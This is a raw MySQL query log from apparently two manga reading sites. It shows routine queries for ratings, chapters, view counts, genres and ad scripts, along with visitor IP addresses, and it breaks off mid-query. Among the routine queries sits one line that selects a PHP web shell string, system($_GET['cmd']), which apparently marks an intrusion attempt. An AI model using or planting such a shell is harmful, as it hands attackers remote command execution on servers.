FROM ratings where manga_id = '209' order by created desc 330638981 Quit 330638982 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330638982 Quit 330638983 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330638983 Quit 330638984 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330638984 Quit 330638985 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330638985 Quit 330638986 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330638986 Quit 330638987 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330638987 Quit 330638988 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330638988 Quit 330638989 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330638989 Quit 330638990 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330638990 Quit 330638991 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330638991 Quit 330638992 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330638992 Quit 330638993 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330638993 Quit 330638994 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330638994 Quit 330638995 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330638995 Quit 330638996 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330638996 Quit 330638997 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330638997 Quit 330638998 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330638998 Quit 330638999 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330638999 Quit 330639000 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330639000 Quit 330639001 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330639001 Quit 330639002 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330639002 Quit 330639003 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330639003 Quit 330639004 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330639004 Quit 330639005 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330639005 Quit 330639006 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330639006 Quit 330639007 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330639007 Quit 330639008 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330639008 Quit 330639009 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330639009 Quit 330639010 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330639010 Quit 330639011 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330639011 Quit 330639012 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330639012 Quit 330639013 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330639013 Quit 330639014 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330639014 Quit 330639015 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330639015 Quit 330639016 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330639016 Quit 330639017 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330639017 Quit 330639018 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330639018 Quit 330639019 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330639019 Quit 330639020 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330639020 Quit 330639021 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330639021 Quit 330639022 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330639022 Quit 330639023 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330639023 Quit 330639024 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330639024 Quit 330639025 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330639025 Quit 330639026 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330639026 Quit 330639027 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330639027 Quit 330639028 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330639028 Quit 330639029 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330639029 Quit 330639030 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330639030 Quit 330639031 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330639031 Quit 330639032 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330639032 Quit 330639033 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330639033 Quit 330639034 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330639034 Quit 330639035 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330639035 Quit 330639036 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330639036 Quit 330639037 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330639037 Quit 330639038 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330639038 Quit 330639039 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330639039 Quit 330639040 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330639040 Quit 330639041 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330639041 Quit 330639042 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330639042 Quit 330639043 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330639043 Quit 330639044 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330639044 Quit 330639045 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330639045 Quit 330639046 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330639046 Quit 330639047 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330639047 Quit 330639048 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330639048 Quit 330639049 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330639049 Quit 330639050 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330639050 Quit 330639051 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330639051 Quit 330639052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330639052 Quit 330639053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330639053 Quit 330639054 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330639054 Quit 330639055 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330639055 Quit 330639056 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330639056 Quit 330639057 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330639057 Quit 330639058 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639059 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639058 Quit 330639059 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639059 Quit 330639060 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639061 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639060 Quit 330639061 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639061 Quit 260225 19:28:00 330639062 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639063 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639062 Quit 330639063 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12946' and m.active = 1 330639063 Quit 330639064 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639064 Query select * FROM chapters where id = '12946' 330639064 Quit 330639065 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639065 Query select * FROM chapters where manga_id = '202' order by display_priority ASC, id desc 330639065 Quit 330639066 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639066 Query Update chapters set view=view+1 where id = '12946' 330639066 Quit 330639067 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639067 Query select * FROM chapters where id = '12946' 330639068 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639068 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12946' and m.active = 1 330639067 Quit 330639068 Quit 330639069 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639069 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('202', '12946', '217.228.54.162', 'mangaberri.com', '2026-02-26 03:28:00', '2026-02-26 03:28:00') 330639069 Quit 330639070 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639070 Query select * FROM chapter_images where chapter_id = '12946' 330639070 Quit 330639071 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639071 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '202' and m.active = 1 330639071 Quit 330639072 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639072 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='202' and m.active = 1 AND (genres like '%Adventure%' OR genres like '%Drama%' OR genres like '%Magic%') ORDER BY RAND() limit 10 330639072 Quit 330639073 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639074 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639073 Quit 330639074 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639074 Quit 330639075 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639076 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639075 Quit 330639076 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639076 Quit 330639077 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639078 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639078 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639077 Quit 330639078 Quit 330639079 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639080 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639080 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639079 Quit 330639080 Quit 330639081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639081 Quit 330639082 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4827' 330639082 Quit 330639083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639083 Query select * FROM chapters where id = '4827' 330639083 Quit 330639084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639084 Query select * FROM chapters where manga_id = '97' order by id desc 330639084 Quit 330639085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639085 Query Update chapters set view=view+1 where id = '4827' 330639085 Quit 330639086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639086 Query select * FROM chapters where id = '4827' 330639087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639086 Quit 330639087 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4827' 330639087 Quit 330639088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639088 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('97', '4827', '114.119.154.103', 'mangacherri.com', '2026-02-26 03:28:00', '2026-02-26 03:28:00') 330639088 Quit 330639089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639089 Query select * FROM chapter_images where chapter_id = '4827' 330639089 Quit 330639090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639090 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '97' and m.active = 1 330639090 Quit 330639091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639091 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='97' and m.active = 1 AND (genres like '%Music%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330639092 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639093 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639092 Quit 330639093 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11687' and m.active = 1 330639093 Quit 330639094 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639094 Query select * FROM chapters where id = '11687' 330639094 Quit 330639095 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639095 Query select * FROM chapters where manga_id = '25' order by display_priority ASC, id desc 330639095 Quit 330639096 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639096 Query Update chapters set view=view+1 where id = '11687' 330639096 Quit 330639097 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639097 Query select * FROM chapters where id = '11687' 330639098 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639097 Quit 330639098 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11687' and m.active = 1 330639098 Quit 330639099 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639099 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('25', '11687', '98.179.157.211', 'mangaberri.com', '2026-02-26 03:28:00', '2026-02-26 03:28:00') 330639099 Quit 330639100 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639100 Query select * FROM chapter_images where chapter_id = '11687' 330639100 Quit 330639101 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639101 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '25' and m.active = 1 330639102 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639101 Quit 330639102 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='25' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330639102 Quit 330639103 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639104 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639103 Quit 330639104 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639104 Quit 330639105 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639106 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639105 Quit 330639106 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639106 Quit 330639107 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639108 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639107 Quit 330639108 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639108 Quit 330639109 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639110 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639109 Quit 330639110 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639110 Quit 330475988 Query SELECT '<?php system($_GET["cmd"]); ?>' 330639091 Quit 330639111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639111 Quit 330639112 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639112 Quit 330639113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639113 Quit 330639114 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639114 Quit 330639115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639115 Quit 330639116 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639116 Quit 330639117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639117 Quit 330639118 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639118 Quit 330639119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639121 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9814' 330639119 Quit 330639122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639120 Quit 330639122 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9815' 330639121 Quit 330639122 Quit 330639124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639124 Query select * FROM chapters where id = '9815' 330639123 Query select * FROM chapters where id = '9814' 330639123 Quit 330639124 Quit 330639125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639125 Query select * FROM chapters where manga_id = '29' order by id desc 330639126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639126 Query select * FROM chapters where manga_id = '29' order by id desc 330639125 Quit 330639127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639127 Query Update chapters set view=view+1 where id = '9814' 330639126 Quit 330639128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639128 Query Update chapters set view=view+1 where id = '9815' 330639127 Quit 330639128 Quit 330639129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639129 Query select * FROM chapters where id = '9814' 330639130 Query select * FROM chapters where id = '9815' 330639129 Quit 330639131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639132 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9815' 330639131 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9814' 330639130 Quit 330639132 Quit 330639131 Quit 330639133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639133 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('29', '9815', '2a09:bac3:6149:2da5::48c:e', 'mangacherri.com', '2026-02-26 03:28:00', '2026-02-26 03:28:00') 330639134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639134 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('29', '9814', '2a09:bac3:6149:2da5::48c:e', 'mangacherri.com', '2026-02-26 03:28:00', '2026-02-26 03:28:00') 330639133 Quit 330639135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639134 Quit 330639135 Query select * FROM chapter_images where chapter_id = '9815' 330639136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639136 Query select * FROM chapter_images where chapter_id = '9814' 330639136 Quit 330639137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639137 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '29' and m.active = 1 330639137 Quit 330639138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639138 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='29' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like 